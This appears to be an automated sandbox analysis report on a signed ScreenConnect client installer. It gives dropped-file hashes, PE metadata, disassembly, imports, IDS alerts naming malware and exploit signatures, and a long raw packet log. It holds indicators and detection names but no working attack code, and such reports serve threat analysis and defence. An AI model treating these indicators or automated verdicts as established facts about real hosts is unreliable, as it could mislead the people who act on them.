                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):147976
                                                                                                                                                                                                Entropy (8bit):5.699150757460175
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
                                                                                                                                                                                                MD5:B7DEB98212080D0214AD779A9446FF09
                                                                                                                                                                                                SHA1:05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
                                                                                                                                                                                                SHA-256:C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
                                                                                                                                                                                                SHA-512:7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):87
                                                                                                                                                                                                Entropy (8bit):3.463057265798253
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                Entropy (8bit):4.3937993114379035
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:gl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNA+OBSqa:44vF0MYQUMM6VFYS+U
                                                                                                                                                                                                MD5:CDB14D65414835795C537A8CA77F943F
                                                                                                                                                                                                SHA1:44A4CDBB72DDD60D7A100C1047013499BE48CD79
                                                                                                                                                                                                SHA-256:8EB683A932DABB4F626D767974E0A6A23EAB448BAE69B385B4BB661333FDAA29
                                                                                                                                                                                                SHA-512:E8EA65BC8821EA6473D0FCC5554FD2F71A6F36C6C4276F098D1D4982A827E79592AAFF2E111EE67F6DC748A4B20AFEB06A33797774C72BFDDB851A997D803BDE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):6.5156988686305
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:pzPO97QouM.exe
                                                                                                                                                                                                File size:83'336 bytes
                                                                                                                                                                                                MD5:47891cf8a43a19e066fe70e812982c98
                                                                                                                                                                                                SHA1:b2a6e75ade18f10e2d0cd709630f5e551dbcefae
                                                                                                                                                                                                SHA256:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899
                                                                                                                                                                                                SHA512:f4294182583c2ad7697afa3ad5a2ef75adde64e72b31fb3eb120bc37cac81e4b16f98fb5e0ffdab193770ca92c54c4b0aeebd70fc7148ef49f07bf9d05a01c2c
                                                                                                                                                                                                SSDEEP:1536:RoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD70xDP:LenkyfPAwiMq0RqRfbaxZJYYDa
                                                                                                                                                                                                TLSH:F4835B43B5D18875E9720E3118B1D9B4593FBE110EA48EAB3398427E0F351D19E3AE7B
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                                                                Entrypoint:0x401489
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                                Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                Signature Valid:true
                                                                                                                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                Error Number:0
                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                Version:3
                                                                                                                                                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                call 00007FCD3C61721Ah
                                                                                                                                                                                                jmp 00007FCD3C616CCFh
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                call dword ptr [0040B048h]
                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                call dword ptr [0040B044h]
                                                                                                                                                                                                push C0000409h
                                                                                                                                                                                                call dword ptr [0040B04Ch]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                call dword ptr [0040B050h]
                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                ret
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                sub esp, 00000324h
                                                                                                                                                                                                push 00000017h
                                                                                                                                                                                                call dword ptr [0040B054h]
                                                                                                                                                                                                test eax, eax
je 00007FCD3C616E57h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h

Programming Language:
• [IMP] VS2008 SP1 build 30729

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2d88 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d58 | 0x5e00 | ec94ce6ebdbe57640638e0aa31d08896 | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.843224204192078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727

DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

Language of compilation system | Country where language is spoken
English | United States

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T17:56:05.088725+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.21.96.148 | 443 | 192.168.2.9 | 49795 | TCP
2024-11-07T17:56:06.805502+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.21.96.148 | 443 | 192.168.2.9 | 49806 | TCP
2024-11-07T17:56:09.240998+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.9 | 49819 | TCP
2024-11-07T17:56:13.053677+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.21.96.148 | 443 | 192.168.2.9 | 49840 | TCP
2024-11-07T17:56:15.654543+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.21.96.148 | 443 | 192.168.2.9 | 49851 | TCP
2024-11-07T17:56:18.231443+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.21.96.148 | 443 | 192.168.2.9 | 49872 | TCP
2024-11-07T17:56:19.784500+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.21.96.148 | 443 | 192.168.2.9 | 49879 | TCP
2024-11-07T17:56:24.162269+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.21.96.148 | 443 | 192.168.2.9 | 49900 | TCP
2024-11-07T17:56:28.361341+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.21.96.148 | 443 | 192.168.2.9 | 49925 | TCP
2024-11-07T17:56:47.202370+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.9 | 50001 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                Nov 7, 2024 17:55:54.534006119 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.534229994 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.534244061 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.580771923 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.580888033 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.580907106 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.620702982 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.644448042 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.650026083 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.650135994 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.650150061 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.697123051 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.697233915 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.697247028 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.697329044 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.765053988 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.765067101 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.765165091 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.811625004 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.811702013 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.875794888 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.875806093 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.875941992 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:54.928297997 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.928308010 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:54.928422928 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.042613029 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.042625904 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.042716026 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.042742968 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.042749882 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.042790890 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.132549047 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.132558107 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.132667065 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.158299923 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.158308029 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.158380032 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.222433090 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.222502947 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.273600101 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.273741961 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.274183989 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.274254084 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.338198900 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.338370085 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.389434099 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.389529943 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.389683962 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.389736891 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.453705072 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.453823090 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.505101919 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.505218029 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.505429029 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.505477905 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.620214939 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.620323896 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.620708942 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.620786905 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.621045113 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.621128082 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.735820055 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.735960007 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.736174107 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.736259937 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.736268997 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.736341953 CET44349727104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:55.736502886 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:55.740050077 CET49727443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:56.138969898 CET49748443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:56.139019012 CET44349748104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:56.139110088 CET49748443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:56.139434099 CET49748443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:56.139445066 CET44349748104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:57.818723917 CET44349748104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:57.859472990 CET49748443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:57.890584946 CET49748443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:57.890607119 CET44349748104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:58.519439936 CET44349748104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:58.519485950 CET44349748104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:58.519541025 CET44349748104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:55:58.519557953 CET49748443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:55:58.519567013 CET44349748104.21.96.148192.168.2.9
